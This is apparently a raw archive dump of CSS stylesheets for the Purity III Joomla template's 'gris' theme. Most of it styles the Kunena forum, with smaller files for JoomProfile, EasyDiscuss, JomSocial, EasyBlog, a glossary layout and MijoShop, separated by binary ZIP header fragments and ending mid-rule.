@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  left: auto;
  right: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #1e1e1e;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #454444;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-right: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-right: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-left: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: left;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: left;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #1e1e1e;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-left: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 12px 0 0;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #1e1e1e;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-right: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #1e1e1e;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #1e1e1e;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-right: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: left;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-left: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  left: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #454444;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 30px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-right: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-left: 0;
    margin-right: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-left: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-left: 15px;
    padding-right: 15px;
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 10px 10px 0;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #454444;
  color: #454444;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-right: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #454444;
  border: 1px solid #454444;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-left: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: left;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  content: " ";
  display: table;
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-right: 5px;
  margin-bottom: 10px;
  float: left;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: right;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-right: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-right: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-left: 1px solid #eeeeee;
  margin-left: -1px;
  padding-left: 20px;
  padding-right: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: right;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  content: " ";
  display: table;
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-left: 10px;
  padding-right: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-right: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #454444;
  color: #454444;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #454444;
  border-color: #454444;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  content: " ";
  display: table;
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: left;
}
#kunena.layout ul.pagination li + li {
  border-left: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  opacity: 0.4;
  filter: alpha(opacity=40);
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-left: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}PKԜ�\+e���;purity_iii/local/css/themes/gris/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKԜ�\BL���;purity_iii/local/css/themes/gris/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-left: 0;
  margin-right: 0;
}PKԜ�\X�_��9purity_iii/local/css/themes/gris/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-right: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-left: 15px;
}PKԜ�\�y���8purity_iii/local/css/themes/gris/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 10px 5px 0;
  display: inline-block;
  line-height: normal !important;
}PKԜ�\>��qq;purity_iii/local/css/themes/gris/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: left;
  margin: 0 1px 10px 0;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #454444;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #454444;
  text-decoration: none;
}PKԜ�\��c8OO8purity_iii/local/css/themes/gris/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-left: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: left;
  margin: 0;
  margin-right: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 10px 10px 0;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-left: 1px solid #eeeeee;
  margin-left: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
